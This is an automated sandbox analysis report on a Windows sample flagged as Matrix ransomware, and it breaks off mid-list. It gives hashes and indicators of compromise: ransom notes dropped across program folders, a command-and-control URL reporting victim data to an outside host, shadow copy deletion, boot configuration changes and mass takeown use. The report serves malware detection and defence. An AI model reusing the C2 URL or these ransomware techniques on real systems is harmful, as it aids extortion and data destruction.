Analysis
-
max time kernel
134s -
max time network
143s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
04-09-2020 03:01
Static task
static1
Behavioral task
behavioral1
Sample
c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
Resource
win7
Behavioral task
behavioral2
Sample
c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
Resource
win10v200722
General
-
Target
c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
-
Size
1.2MB
-
MD5
1e1420d5a472c1f6ce8ac0e3363381eb
-
SHA1
bad3c0a998a65dc7ccfcaec49505f1529658993c
-
SHA256
c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350
-
SHA512
591aaeb7c497a96eb3eb61066058e78766f766211519d432a11774f75708e7fdc47f45df70092a7cb92d513229c32dd7fb43a25e8e8c59f2449586647a3bc75d
Malware Config
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hu\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\es-es\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\cs-cz\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nl\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-tw\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\root\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pl-pl\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\da-dk\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe HTTP URL 30 http://sec.timerz.org/addrecord.php?apikey=bg85_api_key&compuser=LZUKLIOU|Admin&sid=uTUKqH5IJsTQBh5G&phase=[FIN]2626A6541EE2055F|5094|84|5178 Process not Found File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gd\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ca-es\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ta\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kk\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{921a8e1d-4684-4256-adbb-25f4fc1b971f}\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ar\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\de\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sk-sk\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4348 bcdedit.exe 4180 bcdedit.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS QvidfhME64.exe -
Executes dropped EXE 64 IoCs
pid Process 4012 NWEJ8MPw.exe 4172 QvidfhME.exe 4208 QvidfhME64.exe 4380 QvidfhME.exe 4400 QvidfhME.exe 4528 QvidfhME.exe 4548 QvidfhME.exe 4752 QvidfhME.exe 4784 QvidfhME.exe 4916 QvidfhME.exe 4940 QvidfhME.exe 5072 QvidfhME.exe 5096 QvidfhME.exe 4272 QvidfhME.exe 4108 QvidfhME.exe 4540 QvidfhME.exe 4468 QvidfhME.exe 4792 QvidfhME.exe 4624 QvidfhME.exe 5024 QvidfhME.exe 5048 QvidfhME.exe 2152 QvidfhME.exe 4808 QvidfhME.exe 4508 QvidfhME.exe 3796 QvidfhME.exe 4396 QvidfhME.exe 4720 QvidfhME.exe 4912 QvidfhME.exe 5032 QvidfhME.exe 3888 QvidfhME.exe 4320 QvidfhME.exe 2104 QvidfhME.exe 4276 QvidfhME.exe 4748 QvidfhME.exe 4560 QvidfhME.exe 4620 QvidfhME.exe 5068 QvidfhME.exe 4684 QvidfhME.exe 4244 QvidfhME.exe 4392 QvidfhME.exe 4260 QvidfhME.exe 5076 QvidfhME.exe 2220 QvidfhME.exe 3840 QvidfhME.exe 4984 QvidfhME.exe 4636 QvidfhME.exe 4936 QvidfhME.exe 2140 QvidfhME.exe 5092 QvidfhME.exe 4336 QvidfhME.exe 4132 QvidfhME.exe 4804 QvidfhME.exe 5100 QvidfhME.exe 4280 QvidfhME.exe 5040 QvidfhME.exe 5064 QvidfhME.exe 4648 QvidfhME.exe 3780 QvidfhME.exe 4708 QvidfhME.exe 5044 QvidfhME.exe 5020 QvidfhME.exe 4284 QvidfhME.exe 4692 QvidfhME.exe 4180 QvidfhME.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000100000001ad3f-16.dat upx behavioral2/files/0x000100000001ad3f-17.dat upx behavioral2/files/0x000100000001ad3f-27.dat upx behavioral2/files/0x000100000001ad3f-29.dat upx behavioral2/files/0x000100000001ad3f-35.dat upx behavioral2/files/0x000100000001ad3f-37.dat upx behavioral2/files/0x000100000001ad3f-44.dat upx behavioral2/files/0x000100000001ad3f-47.dat upx behavioral2/files/0x000100000001ad3f-53.dat upx behavioral2/files/0x000100000001ad3f-55.dat upx behavioral2/files/0x000100000001ad3f-61.dat upx behavioral2/files/0x000100000001ad3f-63.dat upx behavioral2/files/0x000100000001ad3f-69.dat upx behavioral2/files/0x000100000001ad3f-71.dat upx behavioral2/files/0x000100000001ad3f-79.dat upx behavioral2/files/0x000100000001ad3f-81.dat upx behavioral2/files/0x000100000001ad3f-87.dat upx behavioral2/files/0x000100000001ad3f-89.dat upx behavioral2/files/0x000100000001ad3f-95.dat upx behavioral2/files/0x000100000001ad3f-97.dat upx behavioral2/files/0x000100000001ad3f-103.dat upx behavioral2/files/0x000100000001ad3f-105.dat upx behavioral2/files/0x000100000001ad3f-111.dat upx behavioral2/files/0x000100000001ad3f-113.dat upx behavioral2/files/0x000100000001ad3f-119.dat upx behavioral2/files/0x000100000001ad3f-121.dat upx behavioral2/files/0x000100000001ad3f-127.dat upx behavioral2/files/0x000100000001ad3f-129.dat upx behavioral2/files/0x000100000001ad3f-135.dat upx behavioral2/files/0x000100000001ad3f-137.dat upx behavioral2/files/0x000100000001ad3f-144.dat upx behavioral2/files/0x000100000001ad3f-146.dat upx behavioral2/files/0x000100000001ad3f-152.dat upx behavioral2/files/0x000100000001ad3f-154.dat upx behavioral2/files/0x000100000001ad3f-161.dat upx behavioral2/files/0x000100000001ad3f-163.dat upx behavioral2/files/0x000100000001ad3f-169.dat upx behavioral2/files/0x000100000001ad3f-171.dat upx behavioral2/files/0x000100000001ad3f-177.dat upx behavioral2/files/0x000100000001ad3f-179.dat upx behavioral2/files/0x000100000001ad3f-185.dat upx behavioral2/files/0x000100000001ad3f-187.dat upx behavioral2/files/0x000100000001ad3f-193.dat upx behavioral2/files/0x000100000001ad3f-195.dat upx behavioral2/files/0x000100000001ad3f-201.dat upx behavioral2/files/0x000100000001ad3f-203.dat upx behavioral2/files/0x000100000001ad3f-209.dat upx behavioral2/files/0x000100000001ad3f-211.dat upx behavioral2/files/0x000100000001ad3f-217.dat upx behavioral2/files/0x000100000001ad3f-219.dat upx behavioral2/files/0x000100000001ad3f-226.dat upx behavioral2/files/0x000100000001ad3f-228.dat upx behavioral2/files/0x000100000001ad3f-234.dat upx behavioral2/files/0x000100000001ad3f-236.dat upx behavioral2/files/0x000100000001ad3f-242.dat upx behavioral2/files/0x000100000001ad3f-244.dat upx behavioral2/files/0x000100000001ad3f-250.dat upx behavioral2/files/0x000100000001ad3f-252.dat upx behavioral2/files/0x000100000001ad3f-261.dat upx behavioral2/files/0x000100000001ad3f-263.dat upx behavioral2/files/0x000100000001ad3f-269.dat upx behavioral2/files/0x000100000001ad3f-271.dat upx behavioral2/files/0x000100000001ad3f-277.dat upx behavioral2/files/0x000100000001ad3f-279.dat upx -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 4944 takeown.exe 4492 takeown.exe 4716 takeown.exe 5232 takeown.exe 5152 takeown.exe 6112 takeown.exe 1868 takeown.exe 4640 takeown.exe 5720 takeown.exe 4428 takeown.exe 5540 takeown.exe 5284 takeown.exe 5456 takeown.exe 4924 takeown.exe 5612 takeown.exe 4224 takeown.exe 5300 takeown.exe 4364 takeown.exe 4032 takeown.exe 4960 takeown.exe 5420 takeown.exe 5112 takeown.exe 4732 takeown.exe 4328 takeown.exe 6040 takeown.exe 5116 takeown.exe 4168 takeown.exe 4880 takeown.exe 4760 takeown.exe 5536 takeown.exe 5124 takeown.exe 5348 takeown.exe 5504 takeown.exe 5532 takeown.exe 4296 takeown.exe 4236 takeown.exe 6100 takeown.exe 5380 takeown.exe 5828 takeown.exe 4664 takeown.exe 5384 takeown.exe 5996 takeown.exe 4264 takeown.exe 5604 takeown.exe 4444 takeown.exe 4004 takeown.exe 4500 takeown.exe 5340 takeown.exe 6004 takeown.exe 4956 takeown.exe 5052 takeown.exe 5688 takeown.exe 5840 takeown.exe 4140 takeown.exe 1244 takeown.exe 4504 takeown.exe 5836 takeown.exe 5872 takeown.exe 5036 takeown.exe 4184 takeown.exe 4116 takeown.exe 4892 takeown.exe 5992 takeown.exe 4240 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 26 IoCs
description ioc Process File opened for modification C:\Users\Public\Videos\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Documents\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Music\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Desktop\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Downloads\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Links\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Music\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Searches\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Documents\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Libraries\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Videos\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Pictures\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\G: QvidfhME64.exe File opened (read-only) \??\O: QvidfhME64.exe File opened (read-only) \??\X: QvidfhME64.exe File opened (read-only) \??\U: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\T: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\K: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\E: QvidfhME64.exe File opened (read-only) \??\L: QvidfhME64.exe File opened (read-only) \??\W: QvidfhME64.exe File opened (read-only) \??\J: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\I: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\I: QvidfhME64.exe File opened (read-only) \??\M: QvidfhME64.exe File opened (read-only) \??\T: QvidfhME64.exe File opened (read-only) \??\Z: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\X: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\S: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\A: QvidfhME64.exe File opened (read-only) \??\F: QvidfhME64.exe File opened (read-only) \??\H: QvidfhME64.exe File opened (read-only) \??\Q: QvidfhME64.exe File opened (read-only) \??\V: QvidfhME64.exe File opened (read-only) \??\Y: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\H: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\F: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\E: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\B: QvidfhME64.exe File opened (read-only) \??\J: QvidfhME64.exe File opened (read-only) \??\W: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\V: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\P: 